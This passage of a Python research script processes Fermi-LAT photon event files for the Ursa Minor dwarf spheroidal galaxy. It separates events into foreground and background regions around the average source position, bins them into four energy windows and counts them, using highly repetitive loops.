Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R1_version4.txt\")\nmaxR1V4 = numpy.asmatrix(maxR1V4)\nmaxR2V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R2_version1.txt\")\nmaxR2V1 = numpy.asmatrix(maxR2V1)\nmaxR2V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R2_version2.txt\")\nmaxR2V2 = 
numpy.asmatrix(maxR2V2)\nmaxR2V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R2_version3.txt\")\nmaxR2V3 = numpy.asmatrix(maxR2V3)\nmaxR2V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R2_version4.txt\")\nmaxR2V4 = numpy.asmatrix(maxR2V4)\nmaxR3V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R3_version1.txt\")\nmaxR3V1 = numpy.asmatrix(maxR3V1)\nmaxR3V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R3_version2.txt\")\nmaxR3V2 = numpy.asmatrix(maxR3V2)\nmaxR3V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R3_version3.txt\")\nmaxR3V3 = numpy.asmatrix(maxR3V3)\nmaxR3V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R3_version4.txt\")\nmaxR3V4 = numpy.asmatrix(maxR3V4)\n#band widths\nlowband = 2.15-1.0 #GeV\nmidband = 4.64-2.15\nhieband = 10.0-4.64\nmaxband = 21.5-10\n#exposure\nlowexposure = float(1.22*10**11)\nmidexposure = float(1.32*10**11)\nhieexposure = float(1.33*10**11)\nmaxexposure = float(1.34*10**11)\n#aperture radii in degrees: r1x = foreground disk, r2x/r3x = background annulus inner/outer; x = 1 low, 2 mid, 3 hie, 4 max band\nr11 = 2.5\nr21 = 3.75\nr31 = 5.00\nr12 = 1.5\nr22 = 2.25\nr32 = 3.0\nr13 = 1.0\nr23 = 1.5\nr33 = 2.0\nr14 = 0.8\nr24 = 1.2\nr34 = 1.6\nareaV1fore = pi*(r11**2)\nareaV1back = pi*(r31**2)-pi*(r21**2)\nareaV2fore = pi*(r12**2)\nareaV2back = pi*(r32**2)-pi*(r22**2)\nareaV3fore = pi*(r13**2)\nareaV3back = pi*(r33**2)-pi*(r23**2)\nareaV4fore = pi*(r14**2)\nareaV4back = pi*(r34**2)-pi*(r24**2)\n\n#number of pixels, at 0.09 square degrees per pixel\npixV1fore = areaV1fore / 0.09\npixV1back = areaV1back / 0.09\npixV2fore = areaV2fore / 0.09\npixV2back = areaV2back / 0.09\npixV3fore = areaV3fore / 0.09\npixV3back = areaV3back / 0.09\npixV4fore = areaV4fore / 0.09\npixV4back = areaV4back / 0.09\n#distance formula definition\ndef dist(x1,y1,x2,y2):\n    return sqrt((x1-x2)**2+(y1-y2)**2)\n###############################################################################\n#begin analysis\n###############################################################################\n#average the longitude (column 1) and latitude (column 2) of every version-1 event to locate the source center\nsumlong = 0\nsumlat = 0\nindex = 0\nfor data in (lowR1V1, lowR2V1, lowR3V1, midR1V1, midR2V1, midR3V1, hieR1V1, hieR2V1, hieR3V1, maxR1V1, maxR2V1, maxR3V1):\n    x = 0\n    while x < len(data):\n        sumlong = sumlong + data[x,1]\n        sumlat = sumlat + data[x,2]\n        index = index + 1\n        x = x + 1\navgx = sumlong / index\navgy = sumlat / index\n############################################################################\n############################################################################\n############################################################################\n############################################################################\n############################################################################\n#separate each data set into a foreground disk (d < rfore) and a background annulus (rin < d < rout) around the average center\ndef separate(data, rfore, rin, rout):\n    fore = []\n    back = []\n    x = 0\n    while x < len(data):\n        d = dist(avgx, avgy, data[x,1], data[x,2])\n        if d < rfore:\n            fore.append(data[x])\n        if rin < d < rout:\n            back.append(data[x])\n        x = x + 1\n    return fore, back\n#version1\nlowR1V1fore, lowR1V1back = separate(lowR1V1, r11, r21, r31)\nlowR2V1fore, lowR2V1back = separate(lowR2V1, r11, r21, r31)\nlowR3V1fore, lowR3V1back = separate(lowR3V1, r11, r21, r31)\nlowV1fore = lowR1V1fore\nlowV1back = lowR2V1back\nmidR1V1fore, midR1V1back = separate(midR1V1, r12, r22, r32)\nmidR2V1fore, midR2V1back = separate(midR2V1, r12, r22, r32)\nmidR3V1fore, midR3V1back = separate(midR3V1, r12, r22, r32)\nmidV1fore = midR1V1fore\nmidV1back = midR2V1back\nhieR1V1fore, hieR1V1back = separate(hieR1V1, r13, r23, r33)\nhieR2V1fore, hieR2V1back = separate(hieR2V1, r13, r23, r33)\nhieR3V1fore, hieR3V1back = separate(hieR3V1, r13, r23, r33)\nhieV1fore = hieR1V1fore\nhieV1back = hieR2V1back\nmaxR1V1fore, maxR1V1back = separate(maxR1V1, r14, r24, r34)\nmaxR2V1fore, maxR2V1back = separate(maxR2V1, r14, r24, r34)\nmaxR3V1fore, maxR3V1back = separate(maxR3V1, r14, r24, r34)\nmaxV1fore = maxR1V1fore\nmaxV1back = maxR2V1back\n#version2\nlowR1V2fore, lowR1V2back = separate(lowR1V2, r11, r21, r31)\nlowR2V2fore, lowR2V2back = separate(lowR2V2, r11, r21, r31)\nlowR3V2fore, lowR3V2back = separate(lowR3V2, r11, r21, r31)\nlowV2fore = lowR1V2fore\nlowV2back = lowR2V2back\nmidR1V2fore, midR1V2back = separate(midR1V2, r12, r22, r32)\nmidR2V2fore, midR2V2back = separate(midR2V2, r12, r22, r32)\nmidR3V2fore, midR3V2back = separate(midR3V2, r12, r22, r32)\nmidV2fore = midR1V2fore\nmidV2back = midR2V2back\nhieR1V2fore, hieR1V2back = separate(hieR1V2, r13, r23, r33)\nhieR2V2fore, hieR2V2back = separate(hieR2V2, r13, r23, r33)\nhieR3V2fore, hieR3V2back = separate(hieR3V2, r13, r23, r33)\nhieV2fore = hieR1V2fore\nhieV2back = hieR2V2back\nmaxR1V2fore, maxR1V2back = separate(maxR1V2, r14, r24, r34)\nmaxR2V2fore, maxR2V2back = separate(maxR2V2, r14, r24, r34)\nmaxR3V2fore, maxR3V2back = separate(maxR3V2, r14, r24, r34)\nmaxV2fore = maxR1V2fore\nmaxV2back = maxR2V2back\n#version3\nlowR1V3fore, lowR1V3back = separate(lowR1V3, r11, r21, r31)\nlowR2V3fore, lowR2V3back = separate(lowR2V3, r11, r21, r31)\nlowR3V3fore, lowR3V3back = separate(lowR3V3, r11, r21, r31)\nlowV3fore = lowR1V3fore\nlowV3back = lowR2V3back\nmidR1V3fore, midR1V3back = separate(midR1V3, r12, r22, r32)\nmidR2V3fore, midR2V3back = separate(midR2V3, r12, r22, r32)\nmidR3V3fore, midR3V3back = separate(midR3V3, r12, r22, r32)\nmidV3fore = midR1V3fore\nmidV3back = midR2V3back\nhieR1V3fore, hieR1V3back = separate(hieR1V3, r13, r23, r33)\nhieR2V3fore, hieR2V3back = separate(hieR2V3, r13, r23, r33)\nhieR3V3fore, hieR3V3back = separate(hieR3V3, r13, r23, r33)\nhieV3fore = hieR1V3fore\nhieV3back = hieR2V3back\nmaxR1V3fore, maxR1V3back = separate(maxR1V3, r14, r24, r34)\nmaxR2V3fore, maxR2V3back = separate(maxR2V3, r14, r24, r34)\nmaxR3V3fore, maxR3V3back = separate(maxR3V3, r14, r24, r34)\nmaxV3fore = maxR1V3fore\nmaxV3back = maxR2V3back\n#version4\nlowR1V4fore, lowR1V4back = separate(lowR1V4, r11, r21, r31)\nlowR2V4fore, lowR2V4back = separate(lowR2V4, r11, r21, r31)\nlowR3V4fore, lowR3V4back = separate(lowR3V4, r11, r21, r31)\nlowV4fore = lowR1V4fore\nlowV4back = lowR2V4back\nmidR1V4fore, midR1V4back = separate(midR1V4, r12, r22, r32)\nmidR2V4fore, midR2V4back = separate(midR2V4, r12, r22, r32)\nmidR3V4fore, midR3V4back = separate(midR3V4, r12, r22, r32)\nmidV4fore = midR1V4fore\nmidV4back = midR2V4back\nhieR1V4fore, hieR1V4back = separate(hieR1V4, r13, r23, r33)\nhieR2V4fore, hieR2V4back = separate(hieR2V4, r13, r23, r33)\nhieR3V4fore, hieR3V4back = separate(hieR3V4, r13, r23, r33)\nhieV4fore = hieR1V4fore\nhieV4back = hieR2V4back\nmaxR1V4fore, maxR1V4back = separate(maxR1V4, r14, r24, r34)\nmaxR2V4fore, maxR2V4back = separate(maxR2V4, r14, r24, r34)\nmaxR3V4fore, maxR3V4back = separate(maxR3V4, r14, r24, r34)\nmaxV4fore = maxR1V4fore\nmaxV4back = maxR2V4back\n############################################################################\n############################################################################\n############################################################################\n############################################################################\n############################################################################\n#bin the region events into the four energy windows in MeV: 1000-2150, 2150-4640, 4640-10000, 10000-21500\n#version1\nrightlowV1fore = []\nrightlowV1back = []\nrightmidV1fore = []\nrightmidV1back = []\nrighthieV1fore = []\nrighthieV1back = []\nrightmaxV1fore = []\nrightmaxV1back = []\nx = 0\nwhile x < len(lowV1fore):\n    temp = numpy.array(lowV1fore[x])\n    if 1000 < temp[0][0] < 2150:\n        rightlowV1fore.append(numpy.asmatrix(temp))\n    if 2150 < temp[0][0] < 4640:\n        rightmidV1fore.append(numpy.asmatrix(temp))\n    if 4640 < temp[0][0] < 10000:\n        righthieV1fore.append(numpy.asmatrix(temp))\n    if 10000 < temp[0][0] < 21500:\n        rightmaxV1fore.append(numpy.asmatrix(temp))\n    x = x + 1\nx = 0\nwhile x < len(lowV1back):\n    temp = numpy.array(lowV1back[x])\n    if 1000 < temp[0][0] < 2150:\n        rightlowV1back.append(numpy.asmatrix(temp))\n    if 2150 < temp[0][0] < 4640:\n        rightmidV1back.append(numpy.asmatrix(temp))\n    if 4640 < temp[0][0] < 10000:\n        righthieV1back.append(numpy.asmatrix(temp))\n    if 10000 < temp[0][0] < 21500:\n        rightmaxV1back.append(numpy.asmatrix(temp))\n    x = x + 1\nx = 0\nwhile x < len(midV1fore):\n    temp = numpy.array(midV1fore[x])\n    if 1000 < temp[0][0] < 2150:\n        rightlowV1fore.append(numpy.asmatrix(temp))\n    if 2150 < temp[0][0] < 4640:\n        rightmidV1fore.append(numpy.asmatrix(temp))\n    if 4640 < temp[0][0] < 10000:\n        righthieV1fore.append(numpy.asmatrix(temp))\n    if 10000 < temp[0][0] < 21500:\n        rightmaxV1fore.append(numpy.asmatrix(temp))\n    x = x + 1\nx = 0\nwhile x < len(midV1back):\n    temp = numpy.array(midV1back[x])\n    if 1000 < temp[0][0] < 2150:\n        rightlowV1back.append(numpy.asmatrix(temp))\n    if 2150 < temp[0][0] < 4640:\n        rightmidV1back.append(numpy.asmatrix(temp))\n    if 4640 < temp[0][0] < 10000:\n        righthieV1back.append(numpy.asmatrix(temp))\n    if 10000 < temp[0][0] < 21500:\n        rightmaxV1back.append(numpy.asmatrix(temp))\n    x = x + 1\nx = 0\nwhile x < len(hieV1fore):\n    temp = numpy.array(hieV1fore[x])\n    if 1000 < temp[0][0] < 2150:\n        rightlowV1fore.append(numpy.asmatrix(temp))\n    if 2150 < temp[0][0] < 4640:\n        rightmidV1fore.append(numpy.asmatrix(temp))\n    if 4640 < temp[0][0] < 10000:\n        righthieV1fore.append(numpy.asmatrix(temp))\n    if 10000 < temp[0][0] < 21500:\n        rightmaxV1fore.append(numpy.asmatrix(temp))\n    x = x + 1\nx = 0\nwhile x < len(hieV1back):\n    temp = numpy.array(hieV1back[x])\n    if 1000 < temp[0][0] < 2150:\n        rightlowV1back.append(numpy.asmatrix(temp))\n    if 2150 < temp[0][0] < 4640:\n        rightmidV1back.append(numpy.asmatrix(temp))\n    if 4640 < temp[0][0] < 
10000:\n righthieV1back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV1back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV1fore):\n temp = numpy.array(maxV1fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV1fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV1fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV1fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV1fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV1back):\n temp = numpy.array(maxV1back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV1back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV1back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV1back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV1back.append(numpy.asmatrix(temp))\n x = x + 1\n#version2\nrightlowV2fore = []\nrightlowV2back = []\nrightmidV2fore = []\nrightmidV2back = []\nrighthieV2fore = []\nrighthieV2back = []\nrightmaxV2fore = []\nrightmaxV2back = []\nx = 0\nwhile x < len(lowV2fore):\n temp = numpy.array(lowV2fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(lowV2back):\n temp = numpy.array(lowV2back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(midV2fore):\n temp = numpy.array(midV2fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(midV2back):\n temp = numpy.array(midV2back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(hieV2fore):\n temp = numpy.array(hieV2fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(hieV2back):\n temp = numpy.array(hieV2back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV2fore):\n temp = numpy.array(maxV2fore[x])\n if 1000 < temp[0][0] < 
2150:\n rightlowV2fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV2back):\n temp = numpy.array(maxV2back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV2back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV2back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV2back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV2back.append(numpy.asmatrix(temp))\n x = x + 1\n#version3\nrightlowV3fore = []\nrightlowV3back = []\nrightmidV3fore = []\nrightmidV3back = []\nrighthieV3fore = []\nrighthieV3back = []\nrightmaxV3fore = []\nrightmaxV3back = []\nx = 0\nwhile x < len(lowV3fore):\n temp = numpy.array(lowV3fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(lowV3back):\n temp = numpy.array(lowV3back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(midV3fore):\n temp = numpy.array(midV3fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(midV3back):\n temp = numpy.array(midV3back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(hieV3fore):\n temp = numpy.array(hieV3fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(hieV3back):\n temp = numpy.array(hieV3back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV3fore):\n temp = numpy.array(maxV3fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 
21500:\n rightmaxV3fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV3back):\n temp = numpy.array(maxV3back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV3back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV3back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV3back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV3back.append(numpy.asmatrix(temp))\n x = x + 1\n#version4\nrightlowV4fore = []\nrightlowV4back = []\nrightmidV4fore = []\nrightmidV4back = []\nrighthieV4fore = []\nrighthieV4back = []\nrightmaxV4fore = []\nrightmaxV4back = []\nx = 0\nwhile x < len(lowV4fore):\n temp = numpy.array(lowV4fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(lowV4back):\n temp = numpy.array(lowV4back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(midV4fore):\n temp = numpy.array(midV4fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(midV4back):\n temp = numpy.array(midV4back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(hieV4fore):\n temp = numpy.array(hieV4fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(hieV4back):\n temp = numpy.array(hieV4back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4back.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV4fore):\n temp = numpy.array(maxV4fore[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4fore.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 4640:\n rightmidV4fore.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4fore.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4fore.append(numpy.asmatrix(temp))\n x = x + 1\nx = 0\nwhile x < len(maxV4back):\n temp = numpy.array(maxV4back[x])\n if 1000 < temp[0][0] < 2150:\n rightlowV4back.append(numpy.asmatrix(temp))\n if 2150 < temp[0][0] < 
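4640 and False:\n        pass  #no-op guard; the note below is an addition, not original logic\n    #note: these four windows (1000-2150, 2150-4640, 4640-10000, 10000-21500 MeV) match\n    #lowband, midband, hieband and maxband defined near the top of the script\n    if 2150 < temp[0][0] < 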
4640:\n rightmidV4back.append(numpy.asmatrix(temp))\n if 4640 < temp[0][0] < 10000:\n righthieV4back.append(numpy.asmatrix(temp))\n if 10000 < temp[0][0] < 21500:\n rightmaxV4back.append(numpy.asmatrix(temp))\n x = x + 1\n\n#events\neventslowV1fore = len(rightlowV1fore)\neventslowV1back = len(rightlowV1back)\neventsmidV1fore = len(rightmidV1fore)\neventsmidV1back = len(rightmidV1back)\neventshieV1fore = len(righthieV1fore)\neventshieV1back = len(righthieV1back)\neventsmaxV1fore = len(rightmaxV1fore)\neventsmaxV1back = len(rightmaxV1back)\neventslowV2fore = len(rightlowV2fore)\neventslowV2back = len(rightlowV2back)\neventsmidV2fore = len(rightmidV2fore)\neventsmidV2back = len(rightmidV2back)\neventshieV2fore = len(righthieV2fore)\neventshieV2back = len(righthieV2back)\neventsmaxV2fore = len(rightmaxV2fore)\neventsmaxV2back = len(rightmaxV2back)\neventslowV3fore = len(rightlowV3fore)\neventslowV3back = len(rightlowV3back)\neventsmidV3fore = len(rightmidV3fore)\neventsmidV3back = len(rightmidV3back)\neventshieV3fore = len(righthieV3fore)\neventshieV3back = len(righthieV3back)\neventsmaxV3fore = len(rightmaxV3fore)\neventsmaxV3back = len(rightmaxV3back)\neventslowV4fore = len(rightlowV4fore)\neventslowV4back = len(rightlowV4back)\neventsmidV4fore = len(rightmidV4fore)\neventsmidV4back = len(rightmidV4back)\neventshieV4fore = len(righthieV4fore)\neventshieV4back = len(righthieV4back)\neventsmaxV4fore = len(rightmaxV4fore)\neventsmaxV4back = len(rightmaxV4back)\n\n#energy\nlowV1foreenergy = []\nx = 0\nwhile x < len(rightlowV1fore):\n temp = numpy.array(rightlowV1fore[x])\n lowV1foreenergy.append(temp[0][0])\n x = x + 1\nlowV1backenergy = []\nx = 0\nwhile x < len(rightlowV1back):\n temp = numpy.array(rightlowV1back[x])\n lowV1backenergy.append(temp[0][0])\n x = x + 1\nmidV1foreenergy = []\nx = 0\nwhile x < len(rightmidV1fore):\n temp = numpy.array(rightmidV1fore[x])\n midV1foreenergy.append(temp[0][0])\n x = x + 1\nmidV1backenergy = []\nx = 0\nwhile x < len(rightmidV1back):\n temp = numpy.array(rightmidV1back[x])\n midV1backenergy.append(temp[0][0])\n x = x + 1\nhieV1foreenergy = []\nx = 0\nwhile x < len(righthieV1fore):\n temp = numpy.array(righthieV1fore[x])\n hieV1foreenergy.append(temp[0][0])\n x = x + 1\nhieV1backenergy = []\nx = 0\nwhile x < len(righthieV1back):\n temp = numpy.array(righthieV1back[x])\n hieV1backenergy.append(temp[0][0])\n x = x + 1\nmaxV1foreenergy = []\nx = 0\nwhile x < len(rightmaxV1fore):\n temp = numpy.array(rightmaxV1fore[x])\n maxV1foreenergy.append(temp[0][0])\n x = x + 1\nmaxV1backenergy = []\nx = 0\nwhile x < len(rightmaxV1back):\n temp = numpy.array(rightmaxV1back[x])\n maxV1backenergy.append(temp[0][0])\n x = x + 1\nlowV2foreenergy = []\nx = 0\nwhile x < len(rightlowV2fore):\n temp = numpy.array(rightlowV2fore[x])\n lowV2foreenergy.append(temp[0][0])\n x = x + 1\nlowV2backenergy = []\nx = 0\nwhile x < len(rightlowV2back):\n temp = numpy.array(rightlowV2back[x])\n lowV2backenergy.append(temp[0][0])\n x = x + 1\nmidV2foreenergy = []\nx = 0\nwhile x < len(rightmidV2fore):\n temp = numpy.array(rightmidV2fore[x])\n midV2foreenergy.append(temp[0][0])\n x = x + 1\nmidV2backenergy = []\nx = 0\nwhile x < len(rightmidV2back):\n temp = numpy.array(rightmidV2back[x])\n midV2backenergy.append(temp[0][0])\n x = x + 1\nhieV2foreenergy = []\nx = 0\nwhile x < len(righthieV2fore):\n temp = numpy.array(righthieV2fore[x])\n hieV2foreenergy.append(temp[0][0])\n x = x + 1\nhieV2backenergy = []\nx = 0\nwhile x < len(righthieV2back):\n temp = numpy.array(righthieV2back[x])\n 
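#temp is a one-row matrix; column 0 holds the event energy in MeV\n    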
